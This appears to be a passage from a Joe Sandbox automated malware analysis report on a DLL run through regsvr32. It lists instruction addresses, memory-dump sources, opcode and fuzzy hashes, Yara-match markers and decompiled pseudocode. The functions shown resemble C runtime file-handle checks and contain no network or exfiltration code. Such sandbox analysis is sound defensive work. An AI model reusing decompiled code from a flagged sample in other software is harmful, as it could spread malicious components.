                                                                              0x100492df
                                                                              0x100492fd
                                                                              0x100492ff
                                                                              0x100493ab
                                                                              0x100493ab
                                                                              0x100493b2
                                                                              0x100493b4
                                                                              0x100493b9
                                                                              0x100493bf
                                                                              0x100493c4
                                                                              0x100493c7
                                                                              0x100493cc
                                                                              0x100493ce
                                                                              0x100493d3
                                                                              0x100493d3
                                                                              0x100493d6
                                                                              0x100493fb
                                                                              0x100493fb
                                                                              0x10049305
                                                                              0x1004930b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10049314
                                                                              0x1004931f
                                                                              0x10049322
                                                                              0x10049325
                                                                              0x10049329
                                                                              0x10049331
                                                                              0x10049334
                                                                              0x10049365
                                                                              0x1004936b
                                                                              0x1004936f
                                                                              0x10049374
                                                                              0x10049387
                                                                              0x1004938c
                                                                              0x10049392
                                                                              0x10049397
                                                                              0x10049399
                                                                              0x1004939b
                                                                              0x10049376
                                                                              0x10049376
                                                                              0x10049383
                                                                              0x10049383
                                                                              0x100493a2
                                                                              0x100493a7
                                                                              0x10049336
                                                                              0x10049336
                                                                              0x1004933d
                                                                              0x1004933f
                                                                              0x10049344
                                                                              0x1004934a
                                                                              0x1004934f
                                                                              0x10049352
                                                                              0x10049359
                                                                              0x1004935e
                                                                              0x1004935e
                                                                              0x1004935e
                                                                              0x00000000
                                                                              0x10049334
                                                                              0x100492e1
                                                                              0x100492e8
                                                                              0x100492ea
                                                                              0x100492ef
                                                                              0x100492f5
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c45fcc5126d12cf4ac84f679e6621416b3af0b885e72276417d762ed28d0b15c
                                                                              • Instruction ID: 7d700a0603e5c1040f7b045541b532ab88f4f06fb5f27ae876c1052057bbc080
                                                                              • Opcode Fuzzy Hash: c45fcc5126d12cf4ac84f679e6621416b3af0b885e72276417d762ed28d0b15c
                                                                              • Instruction Fuzzy Hash: 9C31F03A6107808BC311CF66A98170EB7A5FBC6B84F614135EF998B799CF79D841CB08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10051850 Relevance: .1, Instructions: 90COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E10051850(void* __ebx, signed int __ecx, void* __ebp, long long __rbx, void* __rcx, void* __rdx, signed int __rdi, long long __rsi, void* __rbp, void* __r8, long long __r12, long long __r13, long long __r14, void* __r15, signed int _a8, void* _a32) {
				void* _v8;
				void* _v16;
				void* _v24;
				void* _v32;
				void* _v40;
				signed long long _v72;
				void* _t29;
				void* _t33;
				void* _t34;
				void* _t43;
				signed int _t54;
				signed int _t56;
				void* _t58;
				intOrPtr* _t63;
				intOrPtr* _t64;
				intOrPtr* _t65;
				signed long long _t74;
				signed long long _t78;
				intOrPtr* _t80;

				_t82 = __r12;
				_t81 = __r8;
				_t79 = __rbp;
				_t75 = __rsi;
				_t72 = __rdi;
				_t70 = __rdx;
				_t69 = __rcx;
				_t43 = __ebx;
				_a8 = __ecx;
				_t63 = _t80;
				 *((long long*)(_t63 + 0x20)) = __rbx;
				 *((long long*)(_t63 - 8)) = __rsi;
				 *((long long*)(_t63 - 0x10)) = __rdi;
				 *((long long*)(_t63 - 0x18)) = __r12;
				 *((long long*)(_t63 - 0x20)) = __r13;
				 *((long long*)(_t63 - 0x28)) = __r14;
				r12d = r8d;
				_t67 = __ecx;
				_t62 = __ebx - 0xfffffffe;
				if(__ebx != 0xfffffffe) {
					__eflags = __ecx;
					if(__eflags < 0) {
						L10:
						E1003AF70(__eflags, _t63);
						 *_t63 = 0;
						E1003AF40(_t63);
						 *_t63 = 9;
						_v72 = _t72;
						r9d = 0;
						r8d = 0;
						__eflags = 0;
						E1003C790(_t67, _t69, _t70, _t72, _t75, _t79, _t81);
						_t22 = _t72 - 1; // -1
						_t33 = _t22;
						L11:
						return _t33;
					}
					__eflags = __ebx -  *0x10077288;
					if(__eflags >= 0) {
						goto L10;
					}
					_t78 = __ecx >> 5;
					dil = __ebx;
					_t56 = _t54 & 0x0000001f;
					_t74 = __rdi << 6;
					_t64 =  *((intOrPtr*)(0x100772a0 + _t78 * 8));
					__eflags =  *(_t64 + _t74 + 8) & 0x00000001;
					if(__eflags != 0) {
						_t34 = E1004C9C0(_t29, __ebx, _t56, __ecx, _t74, _t78, __r12, __rdx);
						_t65 =  *((intOrPtr*)(0x100772a0 + _t78 * 8));
						__eflags =  *(_t65 + _t74 + 8) & 0x00000001;
						if(( *(_t65 + _t74 + 8) & 0x00000001) == 0) {
							E1003AF40(_t65);
							 *_t65 = 9;
							E1003AF70(__eflags, _t65);
							__eflags = 0;
							 *_t65 = 0;
							_t58 = 0xffffffff;
						} else {
							r8d = r12d;
							_t58 = E10050F80(_t34, _t43, _t56, __ebp, _t67, __rdx, _t74, _t78, _t82, __rdx, 0x100772a0, __r15);
						}
						E1004CAA0();
						_t33 = _t58;
					} else {
						E1003AF70(__eflags, _t64);
						 *_t64 = 0;
						E1003AF40(_t64);
						 *_t64 = 9;
						_v72 = _t74;
						r9d = 0;
						r8d = 0;
						E1003C790(__ecx, __rcx, __rdx, _t74, _t78, __rbp, __r8);
						_t14 = _t74 - 1; // -1
						_t33 = _t14;
					}
					goto L11;
				}
				E1003AF70(_t62, _t63);
				 *_t63 = 0;
				E1003AF40(_t63);
				 *_t63 = 9;
				_t8 = _t67 + 1; // 0x1
				_t33 = _t8;
				goto L11;
			}






















                                                                              0x10051850
                                                                              0x10051850
                                                                              0x10051850
                                                                              0x10051850
                                                                              0x10051850
                                                                              0x10051850
                                                                              0x10051850
                                                                              0x10051850
                                                                              0x10051850
                                                                              0x10051854
                                                                              0x1005185b
                                                                              0x1005185f
                                                                              0x10051863
                                                                              0x10051867
                                                                              0x1005186b
                                                                              0x1005186f
                                                                              0x10051873
                                                                              0x10051879
                                                                              0x1005187c
                                                                              0x1005187f
                                                                              0x1005189d
                                                                              0x1005189f
                                                                              0x1005194b
                                                                              0x1005194b
                                                                              0x10051952
                                                                              0x10051954
                                                                              0x10051959
                                                                              0x1005195f
                                                                              0x10051964
                                                                              0x10051967
                                                                              0x1005196c
                                                                              0x1005196e
                                                                              0x10051973
                                                                              0x10051973
                                                                              0x10051976
                                                                              0x1005199b
                                                                              0x1005199b
                                                                              0x100518a5
                                                                              0x100518ab
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100518b4
                                                                              0x100518bf
                                                                              0x100518c2
                                                                              0x100518c5
                                                                              0x100518c9
                                                                              0x100518d1
                                                                              0x100518d4
                                                                              0x10051905
                                                                              0x1005190b
                                                                              0x1005190f
                                                                              0x10051914
                                                                              0x10051927
                                                                              0x1005192c
                                                                              0x10051932
                                                                              0x10051937
                                                                              0x10051939
                                                                              0x1005193b
                                                                              0x10051916
                                                                              0x10051916
                                                                              0x10051923
                                                                              0x10051923
                                                                              0x10051942
                                                                              0x10051947
                                                                              0x100518d6
                                                                              0x100518d6
                                                                              0x100518dd
                                                                              0x100518df
                                                                              0x100518e4
                                                                              0x100518ea
                                                                              0x100518ef
                                                                              0x100518f2
                                                                              0x100518f9
                                                                              0x100518fe
                                                                              0x100518fe
                                                                              0x100518fe
                                                                              0x00000000
                                                                              0x100518d4
                                                                              0x10051881
                                                                              0x10051888
                                                                              0x1005188a
                                                                              0x1005188f
                                                                              0x10051895
                                                                              0x10051895
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1cf6013ead6ce313c336416a8b68704d3e7b120f0fd882fd6236a85ffb25d921
                                                                              • Instruction ID: 86f83d2f6ea3cba81f75de7dc9a57adb98251f877552db0f32a6b66a8cc06b09
                                                                              • Opcode Fuzzy Hash: 1cf6013ead6ce313c336416a8b68704d3e7b120f0fd882fd6236a85ffb25d921
                                                                              • Instruction Fuzzy Hash: B731313A7107808BD311CF62A98274EB7A5FBC6B90F518125EF994B759CF79D846CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10048970 Relevance: .1, Instructions: 90COMMONLIBRARYCODECrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 81%
                                                                              			E10048970(void* __ebx, signed int __ecx, long long __rbx, void* __rcx, void* __rdx, signed int __rdi, long long __rsi, void* __rbp, void* __r8, long long __r12, long long __r13, long long __r14, signed int _a8, void* _a32) {
				void* _v8;
				void* _v16;
				void* _v24;
				void* _v32;
				void* _v40;
				signed long long _v72;
				void* _t29;
				void* _t32;
				void* _t38;
				void* _t47;
				signed int _t50;
				signed int _t52;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t60;
				signed long long _t72;
				signed long long _t77;
				intOrPtr* _t79;

				_t80 = __r8;
				_t78 = __rbp;
				_t74 = __rsi;
				_t70 = __rdi;
				_t68 = __rdx;
				_t67 = __rcx;
				_t38 = __ebx;
				_a8 = __ecx;
				_t57 = _t79;
				 *((long long*)(_t57 + 0x20)) = __rbx;
				 *((long long*)(_t57 - 8)) = __rsi;
				 *((long long*)(_t57 - 0x10)) = __rdi;
				 *((long long*)(_t57 - 0x18)) = __r12;
				 *((long long*)(_t57 - 0x20)) = __r13;
				 *((long long*)(_t57 - 0x28)) = __r14;
				r12d = r8d;
				_t65 = __ecx;
				_t56 = __ebx - 0xfffffffe;
				if(__ebx != 0xfffffffe) {
					__eflags = __ecx;
					if(__eflags < 0) {
						L10:
						E1003AF70(__eflags, _t57);
						 *_t57 = 0;
						E1003AF40(_t57);
						 *_t57 = 9;
						_v72 = _t70;
						r9d = 0;
						r8d = 0;
						__eflags = 0;
						_t32 = E1003C790(_t65, _t67, _t68, _t70, _t74, _t78, _t80);
						L11:
						return _t32;
					}
					__eflags = __ebx -  *0x10077288;
					if(__eflags >= 0) {
						goto L10;
					}
					_t77 = __ecx >> 5;
					dil = __ebx;
					_t52 = _t50 & 0x0000001f;
					_t72 = __rdi << 6;
					_t59 =  *((intOrPtr*)(0x100772a0 + _t77 * 8));
					__eflags =  *(_t59 + _t72 + 8) & 0x00000001;
					if(__eflags != 0) {
						E1004C9C0(_t29, __ebx, _t52, __ecx, _t72, _t77, __r12, __rdx);
						_t60 =  *((intOrPtr*)(0x100772a0 + _t77 * 8));
						__eflags =  *(_t60 + _t72 + 8) & 0x00000001;
						if(__eflags == 0) {
							E1003AF40(_t60);
							 *_t60 = 9;
							_t32 = E1003AF70(__eflags, _t60);
							__eflags = 0;
							 *_t60 = 0;
						} else {
							r8d = r12d;
							_t32 = E100488B0(_t38, _t38, _t47, __eflags, _t60, _t65, __rdx, _t72, _t77, __rbp, __r8);
						}
						E1004CAA0();
					} else {
						E1003AF70(__eflags, _t59);
						 *_t59 = 0;
						E1003AF40(_t59);
						 *_t59 = 9;
						_v72 = _t72;
						r9d = 0;
						r8d = 0;
						_t32 = E1003C790(__ecx, __rcx, __rdx, _t72, _t77, __rbp, __r8);
					}
					goto L11;
				}
				E1003AF70(_t56, _t57);
				 *_t57 = 0;
				_t32 = E1003AF40(_t57);
				 *_t57 = 9;
				goto L11;
			}





















                                                                              0x10048970
                                                                              0x10048970
                                                                              0x10048970
                                                                              0x10048970
                                                                              0x10048970
                                                                              0x10048970
                                                                              0x10048970
                                                                              0x10048970
                                                                              0x10048974
                                                                              0x1004897b
                                                                              0x1004897f
                                                                              0x10048983
                                                                              0x10048987
                                                                              0x1004898b
                                                                              0x1004898f
                                                                              0x10048993
                                                                              0x10048999
                                                                              0x1004899c
                                                                              0x1004899f
                                                                              0x100489be
                                                                              0x100489c0
                                                                              0x10048a71
                                                                              0x10048a71
                                                                              0x10048a78
                                                                              0x10048a7a
                                                                              0x10048a7f
                                                                              0x10048a85
                                                                              0x10048a8a
                                                                              0x10048a8d
                                                                              0x10048a92
                                                                              0x10048a94
                                                                              0x10048a9d
                                                                              0x10048ac2
                                                                              0x10048ac2
                                                                              0x100489c6
                                                                              0x100489cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100489d5
                                                                              0x100489e0
                                                                              0x100489e3
                                                                              0x100489e6
                                                                              0x100489ea
                                                                              0x100489f2
                                                                              0x100489f5
                                                                              0x10048a27
                                                                              0x10048a2d
                                                                              0x10048a31
                                                                              0x10048a36
                                                                              0x10048a4a
                                                                              0x10048a4f
                                                                              0x10048a55
                                                                              0x10048a5a
                                                                              0x10048a5c
                                                                              0x10048a38
                                                                              0x10048a38
                                                                              0x10048a40
                                                                              0x10048a45
                                                                              0x10048a67
                                                                              0x100489f7
                                                                              0x100489f7
                                                                              0x100489fe
                                                                              0x10048a00
                                                                              0x10048a05
                                                                              0x10048a0b
                                                                              0x10048a10
                                                                              0x10048a13
                                                                              0x10048a1a
                                                                              0x10048a1f
                                                                              0x00000000
                                                                              0x100489f5
                                                                              0x100489a1
                                                                              0x100489a8
                                                                              0x100489aa
                                                                              0x100489af
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6c3f10897f4f98e1117fc039831e4164f9aa34ad96408f300ff7cca60721c491
                                                                              • Instruction ID: d896453d6c2629af06c7f4f9639d2a0ab2466b792f55de32699839dd357147de
                                                                              • Opcode Fuzzy Hash: 6c3f10897f4f98e1117fc039831e4164f9aa34ad96408f300ff7cca60721c491
                                                                              • Instruction Fuzzy Hash: C331227A7107808AD311CF62A94130EB7A4FBC5B90FA1463AEF68877A5CF79D451C704
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800011F4 Relevance: .1, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1f4f6e8d1d7fb1cefad6bab8572f86962bf991beacb3f1c3af335354cec980e2
                                                                              • Instruction ID: 13dd754d1e7aaa458ccf3f25f1a53950ed55eb7a2af7c94b5f3f3eca6f4c7b71
                                                                              • Opcode Fuzzy Hash: 1f4f6e8d1d7fb1cefad6bab8572f86962bf991beacb3f1c3af335354cec980e2
                                                                              • Instruction Fuzzy Hash: 4141B3B090434E8FCB48DF68C48A4CE7FB0FB58398F204619E856A6250D3B496A5CFC5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180003460 Relevance: .1, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b99b47e9b962ad4e889b98a468eb4c97838fe937d78fd3ed328a07435872d91a
                                                                              • Instruction ID: 25ea7a1fae7cee08e525b2e53d13b9e761fafe3c3046f9c16da3d4363f6b727f
                                                                              • Opcode Fuzzy Hash: b99b47e9b962ad4e889b98a468eb4c97838fe937d78fd3ed328a07435872d91a
                                                                              • Instruction Fuzzy Hash: 7641F0B090078E8BCF48CF68C88A4DE7FB0FB48358F54461DE86AA6350D3B49664CF85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000406C Relevance: .1, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 83981cbbf60b78e7deea3e04e91402b42a32efa8c5dfd88cb8f56556e6fb0c3c
                                                                              • Instruction ID: 2f3c92175ef08bfcd336efc03048a581a759bd19a61f5d08681f8b59d2b4a65d
                                                                              • Opcode Fuzzy Hash: 83981cbbf60b78e7deea3e04e91402b42a32efa8c5dfd88cb8f56556e6fb0c3c
                                                                              • Instruction Fuzzy Hash: CA41EF70508B898FE3A8DF29C48950BBBF2FBC5354F104A1DF69686360D7B5D845CB42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018001B6D4 Relevance: .1, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 93974b6d4f6273d20610df347467165d2a5c3046e1daec97411395bd01693f1f
                                                                              • Instruction ID: 9c4ff176952ec0d3a7c23327861baecbe751e07bc56d6e6d0065064954d6898b
                                                                              • Opcode Fuzzy Hash: 93974b6d4f6273d20610df347467165d2a5c3046e1daec97411395bd01693f1f
                                                                              • Instruction Fuzzy Hash: D93113B0508B84CBD7B4DF24C08979ABBE0FBC4758F608A1CE5D9C6261DBB4984DDB42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100529B0 Relevance: .1, Instructions: 78COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E100529B0(signed long long __ebx, signed int __ecx, signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __rdi, long long __rsi, void* __rbp, void* __r8, long long __r12, void* __r13, signed int _a8, long long _a16, long long _a24, long long _a32) {
				long long _v8;
				long long _v40;
				void* _t25;
				void* _t29;
				signed long long _t38;
				void* _t50;
				signed int _t54;
				void* _t55;
				intOrPtr* _t58;
				intOrPtr* _t59;
				signed long long _t67;
				signed long long _t71;

				_t73 = __r8;
				_t72 = __rbp;
				_t68 = __rsi;
				_t65 = __rdi;
				_t64 = __rdx;
				_t63 = __rcx;
				_t57 = __rax;
				_t38 = __ebx;
				_a8 = __ecx;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_v8 = __r12;
				_t61 = __ecx;
				_t56 = __ebx - 0xfffffffe;
				if(__ebx != 0xfffffffe) {
					__eflags = __ecx;
					if(__eflags < 0) {
						L10:
						E1003AF70(__eflags, _t57);
						 *_t57 = 0;
						E1003AF40(_t57);
						 *_t57 = 9;
						_v40 = _t61;
						r9d = 0;
						r8d = 0;
						__eflags = 0;
						E1003C790(_t61, _t63, _t64, _t65, _t68, _t72, _t73);
						_t20 = _t61 - 1; // -1
						_t29 = _t20;
						L11:
						return _t29;
					}
					__eflags = __ebx -  *0x10077288;
					if(__eflags >= 0) {
						goto L10;
					}
					_t71 = __ecx >> 5;
					dil = __ebx;
					_t54 = __edi & 0x0000001f;
					_t67 = __rdi << 6;
					_t58 =  *((intOrPtr*)(0x100772a0 + _t71 * 8));
					__eflags =  *(_t58 + _t67 + 8) & 0x00000001;
					if(__eflags != 0) {
						E1004C9C0(_t25, __ebx, _t54, __ecx, _t67, _t71, 0x100772a0, __r13);
						_t59 =  *((intOrPtr*)(0x100772a0 + _t71 * 8));
						__eflags =  *(_t59 + _t67 + 8) & 0x00000001;
						if(__eflags == 0) {
							E1003AF40(_t59);
							 *_t59 = 9;
							_t55 = 0xffffffff;
						} else {
							_t55 = E100528D0(_t38, _t50, _t54, __eflags, _t59, _t61, __rdx, _t67, _t71, __rbp, __r8);
						}
						E1004CAA0();
						_t29 = _t55;
					} else {
						E1003AF70(__eflags, _t58);
						 *_t58 = 0;
						E1003AF40(_t58);
						 *_t58 = 9;
						_v40 = __ecx;
						r9d = 0;
						r8d = 0;
						E1003C790(__ecx, __rcx, __rdx, _t67, _t71, __rbp, __r8);
						_t12 = _t61 - 1; // -1
						_t29 = _t12;
					}
					goto L11;
				}
				E1003AF70(_t56, __rax);
				 *__rax = 0;
				E1003AF40(__rax);
				 *__rax = 9;
				_t6 = _t61 - 1; // -1
				_t29 = _t6;
				goto L11;
			}















                                                                              0x100529b0
                                                                              0x100529b0
                                                                              0x100529b0
                                                                              0x100529b0
                                                                              0x100529b0
                                                                              0x100529b0
                                                                              0x100529b0
                                                                              0x100529b0
                                                                              0x100529b0
                                                                              0x100529b8
                                                                              0x100529bd
                                                                              0x100529c2
                                                                              0x100529c7
                                                                              0x100529cc
                                                                              0x100529cf
                                                                              0x100529d2
                                                                              0x100529f0
                                                                              0x100529f2
                                                                              0x10052a8f
                                                                              0x10052a8f
                                                                              0x10052a96
                                                                              0x10052a98
                                                                              0x10052a9d
                                                                              0x10052aa3
                                                                              0x10052aa8
                                                                              0x10052aab
                                                                              0x10052ab0
                                                                              0x10052ab2
                                                                              0x10052ab7
                                                                              0x10052ab7
                                                                              0x10052aba
                                                                              0x10052ad2
                                                                              0x10052ad2
                                                                              0x100529f8
                                                                              0x100529fe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10052a07
                                                                              0x10052a12
                                                                              0x10052a15
                                                                              0x10052a18
                                                                              0x10052a1c
                                                                              0x10052a24
                                                                              0x10052a27
                                                                              0x10052a58
                                                                              0x10052a5e
                                                                              0x10052a62
                                                                              0x10052a67
                                                                              0x10052a74
                                                                              0x10052a79
                                                                              0x10052a7f
                                                                              0x10052a69
                                                                              0x10052a70
                                                                              0x10052a70
                                                                              0x10052a86
                                                                              0x10052a8b
                                                                              0x10052a29
                                                                              0x10052a29
                                                                              0x10052a30
                                                                              0x10052a32
                                                                              0x10052a37
                                                                              0x10052a3d
                                                                              0x10052a42
                                                                              0x10052a45
                                                                              0x10052a4c
                                                                              0x10052a51
                                                                              0x10052a51
                                                                              0x10052a51
                                                                              0x00000000
                                                                              0x10052a27
                                                                              0x100529d4
                                                                              0x100529db
                                                                              0x100529dd
                                                                              0x100529e2
                                                                              0x100529e8
                                                                              0x100529e8
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 71c7eee7b964c1d31d27507bbf20f001db5bdfdc61c2cdda4cb76240df9deadc
                                                                              • Instruction ID: 91451bcfdfc5869902379d836786392622aa4a042d0e44d56d1437995dcdaa74
                                                                              • Opcode Fuzzy Hash: 71c7eee7b964c1d31d27507bbf20f001db5bdfdc61c2cdda4cb76240df9deadc
                                                                              • Instruction Fuzzy Hash: D721BD36A147808FD325CFB2A48170EB7A1FB86780FA54139FA454B75ACB3DE848CB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180012EF8 Relevance: .1, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 613fb402d6b778ceaf7e513f493c666c428009a0501ff02ca6debf04feb91865
                                                                              • Instruction ID: 2086fc6cf530452ca317dde1c3f5989bf97dc2ab51b7d711b1b7619edf53518f
                                                                              • Opcode Fuzzy Hash: 613fb402d6b778ceaf7e513f493c666c428009a0501ff02ca6debf04feb91865
                                                                              • Instruction Fuzzy Hash: 9A4107B090034D9FCF48DF68C89A5DEBFB1FB48358F10865DE96AA6250D3B49664CF84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180010C84 Relevance: .1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fd33be4bf54c8c25dddb299aef1f30db163f836ea6c92e4bd2e4a70074cec26c
                                                                              • Instruction ID: 90c54515c462ca516bd1a7834683e0366852147f904ce70d700c1fd94530822e
                                                                              • Opcode Fuzzy Hash: fd33be4bf54c8c25dddb299aef1f30db163f836ea6c92e4bd2e4a70074cec26c
                                                                              • Instruction Fuzzy Hash: D33198B16187848BD788DF28D44941ABBE1FBDC30CF405B1DF4CAAA360D7789644CB4A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800247FC Relevance: .1, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4dc2512c0ff6dc22a4fb7ff1d0ea1563faee4dc38c2ddbd287c0bb24e1b40528
                                                                              • Instruction ID: 9655ad274102c7f9d75b202b541ab5cd2305fe15ce58f1dcda736dbe1a9cecaf
                                                                              • Opcode Fuzzy Hash: 4dc2512c0ff6dc22a4fb7ff1d0ea1563faee4dc38c2ddbd287c0bb24e1b40528
